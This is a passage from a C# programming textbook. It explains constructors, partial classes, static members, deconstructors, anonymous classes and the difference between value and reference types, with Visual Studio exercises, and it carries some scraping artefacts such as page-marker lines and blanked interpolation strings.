Note The order of the constructors in a class is immaterial; you can
define constructors in the order with which you feel most comfortable.
You can then use this constructor when you create a new Circle object,
such as in the following:
Click here to view code image
Circle c;
c = new Circle(45);
When you build the application, the compiler works out which constructor
it should call based on the parameters that you specify to the new operator. In
this example, you passed an int, so the compiler generates code that invokes
the constructor that takes an int parameter.
You should be aware of an important feature of the C# language: if you
write your own constructor for a class, the compiler does not generate a
default constructor. Therefore, if you’ve written your own constructor that
accepts one or more parameters and you also want a default constructor,
you’ll have to write the default constructor yourself.
Partial classes
A class can contain a number of methods, fields, and constructors, as
well as other items discussed in later chapters. A highly functional class
can become quite large. With C#, you can split the source code for a
class into separate files so that you can organize the definition of a large
class into smaller pieces that are easier to manage. This feature is used
by Visual Studio 2017 for Universal Windows Platform (UWP) apps,
Download from finelybook [email protected]
272
where the source code that the developer can edit is maintained in a
separate file from the code that is generated by Visual Studio whenever
the layout of a form changes.
When you split a class across multiple files, you define the parts of
the class by using the partial keyword in each file. For example, if the
Circle class is split between two files called circ1.cs (containing the
constructors) and circ2.cs (containing the methods and fields), the
contents of circ1.cs look like this:
Click here to view code image
partial class Circle
{
public Circle() // default constructor
{
this.radius = 0;
}
public Circle(int initialRadius) // overloaded constructor
{
this.radius = initialRadius; }
}
}
The contents of circ2.cs look like this:
Click here to view code image
partial class Circle
{
private int radius;
public double Area()
{
return Math.PI * this.radius * this.radius;
}
}
When you compile a class that has been split into separate files, you
must provide all the files to the compiler.
In the following exercise, you will declare a class that models a point in
two-dimensional space. The class will contain two private fields for holding
the x- and y-coordinates of a point and will provide constructors for
Download from finelybook [email protected]
273
initializing these fields. You will create instances of the class by using the
new keyword and calling the constructors.
Write constructors and create objects
1. Start Visual Studio 2017 if it is not already running.
2. Open the Classes solution, which is located in the \Microsoft
Press\VCSBS\Chapter 7\Classes folder in your Documents folder.
3. In Solution Explorer, double-click the file Program.cs to display it in the
Code and Text Editor window.
4. In the Program class, locate the Main method.
The Main method calls the doWork method, which is wrapped in a try
block and followed by a catch handler. With this try/catch block, you
can write the code that would typically go inside Main in the doWork
method instead, and be safe in the knowledge that it will catch and
handle any exceptions. The doWork method currently contains nothing
but a // TODO: comment.
Tip Devlopers frequently add TODO comments as a reminder that
they have left a piece of code to revisit. These comments often
have a description of the work to be performed, such as // TODO:
Implement the doWork method. Visual Studio recognizes this form
of comment, and you can quickly locate them anywhere in an
application by using the Task List window. To display this
window, on the View menu, click Task List. The Task List
window opens below the Code and Text Editor window by default.
All the TODO comments will be listed. You can then double-click
any of these comments to go directly to the corresponding code,
which will be displayed in the Code and Text Editor window.
Download from finelybook [email protected]
274
5. Display the file Point.cs in the Code and Text Editor window.
This file defines a class called Point, which you will use to represent the
location of a point in two-dimensional space, defined by a pair of x- and
y-coordinates. The Point class is currently empty apart from another //
TODO: comment.
6. Return to the Program.cs file. In the Program class, edit the body of the
doWork method, and replace the // TODO: comment with the following
statement:
Point origin = new Point();
This statement creates a new instance of the Point class and invokes its
default constructor.
7. On the Build menu, click Build Solution.
Download from finelybook [email protected]
275
The code builds without error because the compiler automatically
generates the code for a default constructor for the Point class. However,
you cannot see the C# code for this constructor because the compiler
does not generate any source language statements.
8. Return to the Point class in the file Point.cs. Replace the // TODO:
comment with a public constructor that accepts two int arguments,
called x and y, and that calls the Console.WriteLine method to display
the values of these arguments to the console, as shown in bold type in
the following code example:
Click here to view code image
class Point
{
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
9. On the Build menu, click Build Solution.
The compiler now reports an error:
Click here to view code image
There is no argument that corresponds to the required formal
parameter 'x' of
'Point.Point(int, int)'
What this rather verbose message means is that the call to the default
constructor in the doWork method is now invalid because there is no
longer a default constructor. You have written your own constructor for
the Point class, so the compiler does not generate the default
constructor. You will now fix this by writing your own default
constructor.
10. Edit the Point class by adding a public default constructor that calls
Console.WriteLine to write the string “Default constructor called” to the
console, as shown in bold type in the example that follows. The Point
class should now look like this:
Click here to view code image
class Point
Download from finelybook [email protected]
276
{
public Point()
{
Console.WriteLine("Default constructor called");
}
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
11. On the Build menu, click Build Solution.
The program should now build successfully.
12. In the Program.cs file, edit the body of the doWork method. Declare a
variable called bottomRight of type Point, and initialize it to a new Point
object by using the constructor with two arguments, as shown in bold
type in the code that follows. Supply the values 1366 and 768,
representing the coordinates at the lower-right corner of the screen based
on the resolution 1366 × 768 (a common resolution for many tablet
devices). The doWork method should now look like this:
Click here to view code image
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
}
13. On the Debug menu, click Start Without Debugging.
The program builds and runs, displaying the following messages to the
console:
14. Press the Enter key to end the program and return to Visual Studio 2017.
Download from finelybook [email protected]
277
You will now add two int fields to the Point class to represent the x- and
y-coordinates of a point, and you will modify the constructors to
initialize these fields.
15. Edit the Point class in the Point.cs file and add two private fields, called
x and y, of type int, as shown in bold type in the code that follows. The
Point class should now look like this:
Click here to view code image
class Point
{
private int x, y;
public Point()
{
Console.WriteLine( "default constructor called ");
}
public Point(int x, int y)
{
Console.WriteLine($"x:, y:");
}
}
You will modify the second Point constructor to initialize the x and y
fields to the values of the x and y parameters. However, there is a
potential trap when you do this. If you are not careful, the constructor
could look like this:
Click here to view code image
public Point(int x, int y) // Don't type this!
{
x = x;
y = y;
}
Although this code will compile, these statements appear to be
ambiguous. How does the compiler know in the statement x = x; that the
first x is the field and the second x is the parameter? The answer is that it
doesn’t! A method parameter with the same name as a field hides the
field for all statements in the method. All this code actually does is
assign the parameters to themselves; it does not modify the fields at all.
This is clearly not what you want.
Download from finelybook [email protected]
278
The solution is to use the this keyword to qualify which variables are
parameters and which are fields. Prefixing a variable with this means
“the field in this object.”
16. Modify the Point constructor that takes two parameters by replacing the
Console.WriteLine statement with the following code shown in bold
type:
Click here to view code image
public Point(int x, int y)
{
this.x = x;
this.y = y;
}
17. Edit the default Point constructor to initialize the x and y fields to -1, as
follows in bold type. Note that although there are no parameters to cause
confusion (and Visual Studio will pop up a tooltip stating that you don’t
need to use this), it is still good practice to qualify the field references in
this way:
Click here to view code image
public Point()
{
this.x = -1;
this.y = -1;
}
18. On the Build menu, click Build Solution. Confirm that the code
compiles without errors or warnings. (You can run it, but it does not
produce any output.)
Methods that belong to a class and that operate on the data belonging to a
particular instance of a class are called instance methods. (You will learn
about other types of methods later in this chapter.) In the following exercise,
you will write an instance method for the Point class, called DistanceTo,
which calculates the distance between two points.
Write and call instance methods
1. In the Classes project in Visual Studio 2017, add the following public
instance method called DistanceTo to the Point class after the
Download from finelybook [email protected]
279
constructors. The method accepts a single Point argument called other
and returns a double.
The DistanceTo method should look like this:
Click here to view code image
class Point
{
...
public double DistanceTo(Point other)
{
}
}
In the following steps, you will add code to the body of the DistanceTo
instance method to calculate and return the distance between the Point
object being used to make the call and the Point object passed as a
parameter. To do this, you must calculate the difference between the x-
coordinates and the y-coordinates.
2. In the DistanceTo method, declare a local int variable called xDiff and
initialize it with the difference between this.x and other.x, as shown
below in bold type:
Click here to view code image
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
}
3. Declare another local int variable called yDiff and initialize it with the
difference between this.y and other.y, as shown here in bold type:
Click here to view code image
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
}
Download from finelybook [email protected]
280
Note Although the x and y fields are private, other instances of the
same class can still access them. It is important to understand that
the term private operates at the class level and not at the object
level; two objects that are instances of the same class can access
each other’s private data, but objects that are instances of another
class cannot.
To calculate the distance, you can use Pythagoras’ theorem and calculate
the square root of the sum of the square of xDiff and the square of yDiff.
The System.Math class provides the Sqrt method that you can use to
calculate square roots.
4. Declare a variable called distance of type double and use it to hold the
result of the calculation just described:
Click here to view code image
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
double distance = Math.Sqrt((xDiff * xDiff) + (yDiff *
yDiff));
}
5. Add a return statement to the end of the DistanceTo method and return
the value in the distance variable:
Click here to view code image
public double DistanceTo(Point other)
{
int xDiff = this.x - other.x;
int yDiff = this.y - other.y;
double distance = Math.Sqrt((xDiff * xDiff) + (yDiff *
yDiff));
return distance;
}
You will now test the DistanceTo method.
6. Return to the doWork method in the Program class. After the statements
that declare and initialize the origin and bottomRight Point variables,
declare a variable called distance of type double. Initialize this double
Download from finelybook [email protected]
281
variable with the result obtained when you call the DistanceTo method
on the origin object, passing the bottomRight object to it as an argument.
The doWork method should now look like this:
Click here to view code image
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
double distance = origin.DistanceTo(bottomRight);
}
Note Microsoft IntelliSense should display the DistanceTo method
when you type the period character after origin.
7. Add to the doWork method another statement that writes the value of the
distance variable to the console by using the Console.WriteLine method.
The completed doWork method should look like this:
Click here to view code image
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
double distance = origin.DistanceTo(bottomRight);
Console.WriteLine($"Distance is: ");
}
8. On the Debug menu, click Start Without Debugging.
9. Confirm that the value 1568.45465347265 is written to the console
window and then press Enter to close the application and return to
Visual Studio 2017.
Deconstructing an object
Download from finelybook [email protected]
282
You use a constructor to create and initialize an object, typically by
populating any fields it contains. A deconstructor enables you to examine an
object and extract the values of its fields. Taking the Point class from the
previous exercise as an example, you can implement a deconstructor that
retrieves the values of the x and y fields like this:
Click here to view code image
class Point
{
private int x, y;
...
public void Deconstruct(out int x, out int y)
{
x = this.x;
y = this.y;
}
}
You should note this following points about a deconstructor:
It is always named Deconstruct.
It must be a void method.
It must take one or more parameters. These parameters will be
populated with the values from the fields in the objects.
The parameters are marked with the out modifier. This means that if
you assign values to them, these values will be passed back to the
caller (you will learn more about out parameters in Chapter 8,
“Understanding values and references”).
The code in the body of the method assigns the values to be returned to
the parameters.
You call the deconstructor in a manner similar to that used to call a
method that returns a tuple (described in Chapter 3, “Writing methods and
applying scope”). You simply create a tuple and assign an object to it, like
this:
Click here to view code image
Point origin = new Point();
...
(int xVal, int yVal) = origin;
Download from finelybook [email protected]
283
Behind the scenes, C# runs the deconstructor and passes it the variables
defined in the tuple as the parameters. The code in the deconstructor
populates these variables. Assuming that you have not modified the default
constructor for the Point class, the xVal and yVal variables should both
contain the value -1.
Note Remember that you must add the System.ValueType package to
your application if you want to use tuples. Revisit chapter 3 to remind
yourself how to do this using the NuGet Package Manager.
Besides deconstructors, there are other ways to retrieve the values held by
the fields in an object. Chapter 15, “Implementing properties to access fields”
describes another very common strategy.
Understanding static methods and data
In the preceding exercise, you used the Sqrt method of the Math class.
Similarly, when looking at the Circle class, you read the PI field of the Math
class. If you think about it, the way in which you called the Sqrt method or
read the PI field was slightly odd. You invoked the method or read the field
on the class itself, not on an object of type Math. It is like trying to write
Point.DistanceTo rather than origin.DistanceTo in the code you added in the
preceding exercise. So what’s happening, and how does this work?
You will often find that not all methods naturally belong to an instance of
a class; they are utility methods since they provide a useful function that is
independent of any specific class instance. The WriteLine method of the
Console class that has been used extensively throughout this book is a
common example. The Sqrt method is another example. If Sqrt were an
instance method of Math, you’d have to create a Math object on which to call
Sqrt:
Click here to view code image
Download from finelybook [email protected]
284
Math m = new Math();
double d = m.Sqrt(42.24);
This would be cumbersome. The Math object would play no part in the
calculation of the square root. All the input data that Sqrt needs is provided in
the parameter list, and the result is passed back to the caller by using the
method’s return value. Objects are not really needed here, so forcing Sqrt into
an instance straitjacket is just not a good idea.
Note As well as containing the Sqrt method and the PI field, the Math
class contains many other mathematical utility methods, such as Sin,
Cos, Tan, and Log.
In C#, all methods must be declared within a class. However, if you
declare a method or a field as static, you can call the method or access the
field by using the name of the class. No instance is required. This is how the
Sqrt method of the Math class is declared:
Click here to view code image
class Math
{
public static double Sqrt(double d)
{
...
}
...
}
You can invoke the Sqrt method like this:
double d = Math.Sqrt(42.24);
A static method does not depend on an instance of the class, and it cannot
access any instance fields or instance methods defined in the class; it can use
only fields and other methods that are marked as static.
Creating a shared field
Download from finelybook [email protected]
285
Defining a field as static makes it possible for you to create a single instance
of a field that is shared among all objects created from a single class.
(Nonstatic fields are local to each instance of an object.) In the following
example, the static field NumCircles in the Circle class is incremented by the
Circle constructor every time a new Circle object is created:
Click here to view code image
class Circle
{
private int radius;
public static int NumCircles = 0;
public Circle() // default constructor
{
radius = 0;
NumCircles++;
}
public Circle(int initialRadius) // overloaded constructor
{
radius = initialRadius;
NumCircles++;
}
}
All Circle objects share the same instance of the NumCircles field, so the
statement NumCircles++; increments the same data every time a new
instance is created. Notice that you cannot prefix NumCircles with the this
keyword because NumCircles does not belong to a specific object.
You can access the NumCircles field from outside the class by specifying
the Circle class rather than a Circle object, such as in the following example:
Click here to view code image
Console.WriteLine($"Number of Circle objects: {Circle.NumCircles}");
Note Keep in mind that static methods are also called class methods.
However, static fields aren’t usually called class fields; they’re just
called static fields (or sometimes static variables).
Download from finelybook [email protected]
286
Creating a static field by using the const keyword
By prefixing the field with the const keyword, you can declare that a field is
static but that its value can never change. The keyword const is short for
constant. A const field does not use the static keyword in its declaration but
is nevertheless static. However, for reasons that are beyond the scope of this
book, you can declare a field as const only when the field is a numeric type
(such as int or double), a string, or an enumeration. (You will learn about
enumerations in Chapter 9, “Creating value types with enumerations and
structures.”) For example, here’s how the Math class declares PI as a const
field:
Click here to view code image
class Math
{
...
public const double PI = 3.14159265358979;
}
Understanding static classes
Another feature of the C# language is the ability to declare a class as static. A
static class can contain only static members. (All objects that you create by
using the class share a single copy of these members.) The purpose of a static
class is purely to act as a holder of utility methods and fields. A static class
cannot contain any instance data or methods, and it does not make sense to
try to create an object from a static class by using the new operator. In fact,
you can’t actually use new to create an instance of an object using a static
class even if you want to. (The compiler will report an error if you try.) If you
need to perform any initialization, a static class can have a default constructor
as long as it is also declared as static. Any other types of constructor are
illegal and will be reported as such by the compiler.
If you were defining your own version of the Math class, one containing
only static members, it could look like this:
Click here to view code image
public static class Math
{
public static double Sin(double x) {...}
public static double Cos(double x) {...}
Download from finelybook [email protected]
287
public static double Sqrt(double x) {...}
...
}
Note The real Math class is not defined this way because it actually
does have some instance methods.
Static using statements
Whenever you call a static method or reference a static field, you must
specify the class to which the method or field belongs, such as Math.Sqrt or
Console.WriteLine. Static using statements enable you to bring a class into
scope and omit the class name when accessing static members. They operate
in much the same way as ordinary using statements that bring namespaces
into scope. The following example illustrates how to use them:
Click here to view code image
using static System.Math;
using static System.Console;
...
var root = Sqrt(99.9);
WriteLine($"The square root of 99.9 is ");
Note the use of the keyword static in the using statements. The example
brings the static methods of the System.Math and System.Console classes into
scope (you have to fully qualify the classes with their namespaces). You can
then simply call the Sqrt and WriteLine methods. The compiler works out to
which class each method belongs. However, herein lies a potential
maintenance issue. Although you are typing less code, you have to balance
this with the additional effort required when someone else has to maintain
your code, because it is no longer clear to which class each method belongs.
IntelliSense in Visual Studio helps to some extent, but to a developer reading
through the code, it can obfuscate matters when the developer is trying to
track down the causes of bugs. Use static using statements carefully; the
preferred style of the author is not to utilize them, although you are free to
make your own choice!
Download from finelybook [email protected]
288
In the final exercise in this chapter, you will add a private static field to
the Point class and initialize the field to 0. You will increment this count in
both constructors. Finally, you will write a public static method to return the
value of this private static field. With this field, you can find out how many
Point objects you have created.
Write static members and call static methods
1. In Visual Studio 2017, display the Point class in the Code and Text
Editor window.
2. Add a private static field called objectCount of type int to the Point class
immediately before the first constructor. Initialize it to 0 as you declare
it, like this:
Click here to view code image
class Point
{
private int x, y;
private static int objectCount = 0;
public Point()
{
...
}
...
}
Note You can write the keywords private and static in any order
when you declare a field such as objectCount. However, the
preferred order is private first, static second.
3. Add a statement to both Point constructors to increment the objectCount
field, as shown in bold type in the code example that follows.
The Point class should now look like this:
Click here to view code image
Download from finelybook [email protected]
289
class Point
{
private int x, y;
private static int objectCount = 0;
public Point()
{
this.x = -1;
this.y = -1;
objectCount++;
}
public Point(int x, int y)
{
this.x = x;
this.y = y;
objectCount++;
}
...
}
Each time an object is created, its constructor is called. As long as you
increment the objectCount in each constructor (including the default
constructor), objectCount will hold the number of objects created so far.
This strategy works only because objectCount is a shared static field. If
objectCount were an instance field, each object would have its own
personal objectCount field that would be set to 1.
The question now is this: How can users of the Point class find out how
many Point objects have been created? At the moment, the objectCount
field is private and not available outside the class. A poor solution would
be to make the objectCount field publicly accessible. This strategy
would break the encapsulation of the class, and you would then have no
guarantee that the objectCount field’s value was correct because anyone
could change the value in the field. A much better idea is to provide a
public static method that returns the value of the objectCount field. This
is what you will do now.
4. Add a public static method to the end of Point class called ObjectCount
that returns an int but does not take any parameters. This method should
return the value of the objectCount field, as shown in bold type here:
Click here to view code image
class Point
Download from finelybook [email protected]
290
{
...
public static int ObjectCount() => objectCount;
}
5. Display the Program class in the Code and Text Editor window. Add a
statement to the doWork method to write the value returned from the
ObjectCount method of the Point class to the screen, as shown in bold
type in the following code example:
Click here to view code image
static void doWork()
{
Point origin = new Point();
Point bottomRight = new Point(1366, 768);
double distance = origin.distanceTo(bottomRight);
Console.WriteLine($"Distance is: ");
Console.WriteLine($"Number of Point objects:
{Point.ObjectCount()}");
}
The ObjectCount method is called by referencing Point, the name of the
class, and not the name of a Point variable (such as origin or
bottomRight). Because two Point objects have been created by the time
ObjectCount is called, the method should return the value 2.
6. On the Debug menu, click Start Without Debugging.
Confirm that the message “Number of Point objects: 2“ is written to the
console window (after the message displaying the value of the distance
variable).
7. Press Enter to close the program and return to Visual Studio 2017.
Anonymous classes
An anonymous class is a class that does not have a name. This sounds rather
strange, but it is actually quite handy in some situations that you will see later
in this book, especially when using query expressions. (You learn about
query expressions in Chapter 20, “Decoupling application logic and handling
events.”) For the time being, you’ll have to take it on faith that they are
useful.
Download from finelybook [email protected]
291
You create an anonymous class simply by using the new keyword and a
pair of braces defining the fields and values that you want the class to
contain, like this:
Click here to view code image
myAnonymousObject = new { Name = "John ", Age = 47 };
This class contains public fields called Name (initialized to the string
“John“) and Age (initialized to the integer 47). The compiler infers the types
of the fields from the types of the data you specify to initialize them.
When you define an anonymous class, the compiler generates its own
name for the class, but it won’t tell you what it is. Anonymous classes,
therefore, raise a potentially interesting conundrum: if you don’t know the
name of the class, how can you create an object of the appropriate type and
assign an instance of the class to it? In the code example shown earlier, what
should the type of the variable myAnonymousObject be? The answer is that
you don’t know—that is the point of anonymous classes! However, this is not
a problem if you declare myAnonymousObject as an implicitly typed variable
by using the var keyword, like this:
Click here to view code image
var myAnonymousObject = new { Name = "John ", Age = 47 };
Remember that the var keyword causes the compiler to create a variable
of the same type as the expression used to initialize it. In this case, the type of
the expression is whatever name the compiler happens to generate for the
anonymous class.
You can access the fields in the object by using the familiar dot notation,
as demonstrated here:
Click here to view code image
Console.WriteLine($"Name: {myAnonymousObject.Name} Age:
{myAnonymousObject.Age}"};
You can even create other instances of the same anonymous class but with
different values, such as in the following:
Click here to view code image
var anotherAnonymousObject = new { Name = "Diana ", Age = 53 };
Download from finelybook [email protected]
292
The C# compiler uses the names, types, number, and order of the fields to
determine whether two instances of an anonymous class have the same type.
In this case, the variables myAnonymousObject and
anotherAnonymousObject have the same number of fields, with the same
name and type, in the same order, so both variables are instances of the same
anonymous class. This means that you can perform assignment statements
such as this:
Click here to view code image
anotherAnonymousObject = myAnonymousObject;
Note Be warned that this assignment statement might not accomplish
what you expect to happen! You’ll learn more about assigning object
variables in Chapter 8.
There are quite a few restrictions on the contents of an anonymous class.
For example, anonymous classes can contain only public fields, the fields
must all be initialized, they cannot be static, and you cannot define any
methods for them. You will use anonymous classes periodically throughout
this book and learn more about them as you do so.
Summary
In this chapter, you saw how to define new classes. You learned that by
default the fields and methods of a class are private and inaccessible to code
outside the class, but you can use the public keyword to expose fields and
methods to the outside world. You saw how to use the new keyword to create
a new instance of a class and how to define constructors that can initialize
class instances. Finally, you saw how to implement static fields and methods
to provide data and operations that are independent of any specific instance
of a class.
If you want to continue to the next chapter, keep Visual Studio 2017
Download from finelybook [email protected]
293
running and turn to Chapter 8.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare a
class
Write the keyword class, followed by the name of the class,
followed by opening and closing braces. The methods and
fields of the class are declared between the opening and closing
braces. For example:
Click here to view code image
class Point
{
...
}
Declare a
constructor
Write a method whose name is the same as the name of the
class, and that has no return type (not even void). For example:
Click here to view code image
class Point
{
public Point(int x, int y)
{
...
}
}
Call a
constructor
Use the new keyword and specify the constructor with an
appropriate set of parameters. For example:
Point origin = new Point(0, 0);
Declare a
static
method
Write the keyword static before the declaration of the method.
For example:
Click here to view code image
class Point
{
public static int ObjectCount()
Download from finelybook [email protected]
294
{
...
}
}
Call a
static
method
Write the name of the class, followed by a period, followed by
the name of the method. For example:
Click here to view code image
int pointsCreatedSoFar = Point.ObjectCount();
Declare a
static field
Use the keyword static before the type of the field. For
example:
Click here to view code image
class Point
{
...
private static int objectCount;
}
Declare a
const field
Write the keyword const before the declaration of the field and
omit the static keyword. For example:
Click here to view code image
class Math
{
...
public const double PI = ...;
}
Access a
static field
Write the name of the class, followed by a period, followed by
the name of the static field. For example:
Click here to view code image
double area = Math.PI * radius * radius;
Download from finelybook [email protected]
295
CHAPTER 8
Understanding values and
references
After completing this chapter, you will be able to:
Explain the differences between a value type and a reference type.
Modify the way in which arguments are passed as method parameters
by using the ref and out keywords.
Convert a value into a reference by using boxing.
Convert a reference back to a value by using unboxing and casting.
Chapter 7, “Creating and managing classes and objects,” demonstrates how
to declare your own classes and how to create objects by using the new
keyword. That chapter also shows you how to initialize an object by using a
constructor. In this chapter, you will learn how the characteristics of the
primitive types—such as int, double, and char—differ from the
characteristics of class types.
Copying value type variables and classes
Most of the primitive types built into C#, such as int, float, double, and char
(but not string, for reasons that will be covered shortly) are collectively called
value types. These types have a fixed size, and when you declare a variable as
a value type, the compiler generates code that allocates a block of memory
Download from finelybook [email protected]
296
big enough to hold a corresponding value. For example, declaring an int
variable causes the compiler to allocate 4 bytes of memory (32 bits) to hold
the integer value. A statement that assigns a value (such as 42) to the int
causes the value to be copied into this block of memory.
Class types such as Circle (described in Chapter 7) are handled
differently. When you declare a Circle variable, the compiler does not
generate code that allocates a block of memory big enough to hold a Circle;
all it does is allot a small piece of memory that can potentially hold the
address of (or a reference to) another block of memory containing a Circle.
(An address specifies the location of an item in memory.) The memory for
the actual Circle object is allocated only when the new keyword is used to
create the object. A class is an example of a reference type. Reference types
hold references to blocks of memory. To write effective C# programs that
make full use of the Microsoft .NET Framework, you need to understand the
difference between value types and reference types.
Note The string type in C# is actually a class. This is because there is
no standard size for a string (different strings can contain different
numbers of characters), and allocating memory for a string dynamically
when the program runs is far more efficient than doing so statically at
compile time. The description in this chapter of reference types such as
classes applies to the string type as well. In fact, the string keyword in
C# is just an alias for the System.String class.
Consider a situation in which you declare a variable named i as an int and
assign it the value 42. If you declare another variable called copyi as an int
and then assign i to copyi, copyi will hold the same value as i (42). However,
even though copyi and i happen to hold the same value, two blocks of
memory contain the value 42: one block for i and the other block for copyi. If
you modify the value of i, the value of copyi does not change. Let’s see this
in code:
Click here to view code image
Download from finelybook [email protected]
297
int i = 42; // declare and initialize i
int copyi = i; /* copyi contains a copy of the data in i:
i and copyi both contain the value 42 */
i++; /* incrementing i has no effect on copyi;
i now contains 43, but copyi still contains 42 */
The effect of declaring a variable c as a class type, such as Circle, is very
different. When you declare c as a Circle, c can refer to a Circle object; the
actual value held by c is the address of a Circle object in memory. If you
declare an additional variable named refc (also as a Circle) and you assign c
to refc, refc will have a copy of the same address as c; in other words, there is
only one Circle object, and both refc and c now refer to it. Here’s the
example in code:
Click here to view code image
Circle c = new Circle(42);
Circle refc = c;
The following illustration shows both examples. The at sign (@) in the
Circle objects represents a reference holding an address in memory:
This difference is very important. In particular, it means that the behavior
of method parameters depends on whether they are value types or reference
types. You’ll explore this difference in the next exercise.
Download from finelybook [email protected]
298
Copying reference types and data privacy
If you actually want to copy the contents of a Circle object, c, into a
different Circle object, refc, instead of just copying the reference, you
must make refc refer to a new instance of the Circle class and then copy
the data, field by field, from c into refc, like this:
Click here to view code image
Circle refc = new Circle();
refc.radius = c.radius; // Don't try this
However, if any members of the Circle class are private (like the
radius field), you will not be able to copy this data. Instead, you can
make the data in the private fields accessible by exposing them as
properties and then use these properties to read the data from c and copy
it into refc. You will learn how to do this in Chapter 15, “Implementing
properties to access fields.”
Alternatively, a class could provide a Clone method that returns
another instance of the same class but populated with the same data.
The Clone method would have access to the private data in an object
and could copy this data directly to another instance of the same class.
For example, the Clone method for the Circle class could be defined as
shown here:
Click here to view code image
class Circle
{
private int radius;
// Constructors and other methods omitted
...
public Circle Clone()
{
// Create a new Circle object
Circle clone = new Circle();
// Copy private data from this to clone
clone.radius = this.radius;
// Return the new Circle object containing the copied
data
return clone;
}
Download from finelybook [email protected]
299
}
This approach is straightforward if all the private data consists of
values, but if one or more fields are themselves reference types (for
example, the Circle class might be extended to contain a Point object
from Chapter 7, indicating the position of the Circle on a graph), these
reference types also need to provide a Clone method; otherwise, the
Clone method of the Circle class will simply copy a reference to these
fields. This process is known as a deep copy. The alternative approach,
wherein the Clone method simply copies references, is known as a
shallow copy.
The preceding code example also poses an interesting question: How
private is private data? Previously, you saw that the private keyword
renders a field or method inaccessible from outside a class. However,
this does not mean it can be accessed by only a single object. If you
create two objects of the same class, they can each access the private
data of the other within the code for that class. This sounds curious, but
in fact, methods such as Clone depend on this feature. The statement
clone.radius = this.radius; works only because the private radius field
in the clone object is accessible from within the current instance of the
Circle class. So, private actually means “private to the class” rather than
“private to an object.” However, don’t confuse private with static. If
you simply declare a field as private, each instance of the class gets its
own data. If a field is declared as static, each instance of the class shares
the same data.
Use value parameters and reference parameters
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Parameters solution, which is located in the \Microsoft
Press\VCSBS\Chapter 8\Parameters folder in your Documents folder.
The project contains three C# code files: Pass.cs, Program.cs, and
WrappedInt.cs.
3. Display the Pass.cs file in the Code and Text Editor window.
Download from finelybook [email protected]
300
This file defines a class called Pass that is currently empty apart from a
// TODO: comment.
Tip Remember that you can use the Task List window to locate all
TODO comments in a solution.
4. Add a public static method called Value to the Pass class, replacing the
// TODO: comment. This method should accept a single int parameter (a
value type) called param and have the return type void. The body of the
Value method should simply assign the value 42 to param, as shown in
bold type in the following code example:
Click here to view code image
namespace Parameters
{
class Pass
{
public static void Value(int param)
{
param = 42;
}
}
}
Note The reason you are defining this method using the static
keyword is to keep the exercise simple. You can call the Value
method directly on the Pass class without first creating a new Pass
object. The principles illustrated in this exercise apply in the same
manner to instance methods.
5. Display the Program.cs file in the Code and Text Editor window and
then locate the doWork method of the Program class.
Download from finelybook [email protected]
301
The doWork method is called by the Main method when the program
starts running. As explained in Chapter 7, the method call is wrapped in
a try block and followed by a catch handler.
6. Add four statements to the doWork method to perform the following
tasks:
a. Declare a local int variable called i and initialize it to 0.
b. Write the value of i to the console by using Console.WriteLine.
c. Call Pass.Value, passing i as an argument.
d. Write the value of i to the console again.
By running Console.WriteLine before and after the call to Pass.Value,
you can see whether the Pass.Value method actually modifies the value
of i. The completed doWork method should look exactly like this:
Click here to view code image
static void doWork()
{
int i = 0;
Console.WriteLine(i);
Pass.Value(i);
Console.WriteLine(i);
}
7. On the Debug menu, click Start Without Debugging to build and run the
program.
8. Confirm that the value “0” is written to the console window twice.
The assignment statement inside the Pass.Value method that updates the
parameter and sets it to 42 uses a copy of the argument passed in, and
the original argument i is completely unaffected.
9. Press the Enter key to close the application.
You will now see what happens when you pass an int parameter that is
wrapped within a class.
10. Display the WrappedInt.cs file in the Code and Text Editor window.
This file contains the WrappedInt class, which is empty apart from a //
TODO: comment.
Download from finelybook [email protected]
302
11. Add a public instance field called Number of type int to the WrappedInt
class, as shown in bold type in the following code:
Click here to view code image
namespace Parameters
{
class WrappedInt
{
public int Number;
}
}
12. Display the Pass.cs file in the Code and Text Editor window. Add a
public static method called Reference to the Pass class. This method
should accept a single WrappedInt parameter called param and have the
return type void. The body of the Reference method should assign 42 to
param.Number, such as shown here:
Click here to view code image
public static void Reference(WrappedInt param)
{
param.Number = 42;
}
13. Display the Program.cs file in the Code and Text Editor window.
Comment out the existing code in the doWork method and add four
more statements to perform the following tasks:
a. Declare a local WrappedInt variable called wi and initialize it to a new
WrappedInt object by calling the default constructor.
b. Write the value of wi.Number to the console.
c. Call the Pass.Reference method, passing wi as an argument.
d. Write the value of wi.Number to the console again.
As before, with the calls to Console.WriteLine, you can see whether the
call to Pass.Reference modifies the value of wi.Number. The doWork
method should now look exactly like this (the new statements are
highlighted in bold type):
Click here to view code image
static void doWork()
{
Download from finelybook [email protected]
303
// int i = 0;
// Console.WriteLine(i);
// Pass.Value(i);
// Console.WriteLine(i);
WrappedInt wi = new WrappedInt();
Console.WriteLine(wi.Number);
Pass.Reference(wi);
Console.WriteLine(wi.Number);
}
14. On the Debug menu, click Start Without Debugging to build and run the
application.
This time, the two values displayed in the console window correspond to
the value of wi.Number before and after the call to the Pass.Reference
method. You should see that the values 0 and 42 are displayed.
15. Press the Enter key to close the application and return to Visual Studio
2017.
To explain what the previous exercise shows, the value of wi.Number is
initialized to 0 by the compiler-generated default constructor. The wi variable
contains a reference to the newly created WrappedInt object (which contains
an int). The wi variable is then copied as an argument to the Pass.Reference
method. Because WrappedInt is a class (a reference type), wi and param both
refer to the same WrappedInt object. Any changes made to the contents of the
object through the param variable in the Pass.Reference method are visible
by using the wi variable when the method completes. The following diagram
illustrates what happens when a WrappedInt object is passed as an argument
to the Pass.Reference method:
Download from finelybook [email protected]
304
Understanding null values and nullable types
When you declare a variable, it is always a good idea to initialize it. With
value types, it is common to see code such as this:
Click here to view code image
int i = 0;
double d = 0.0;
Remember that to initialize a reference variable such as a class, you can
create a new instance of the class and assign the reference variable to the new
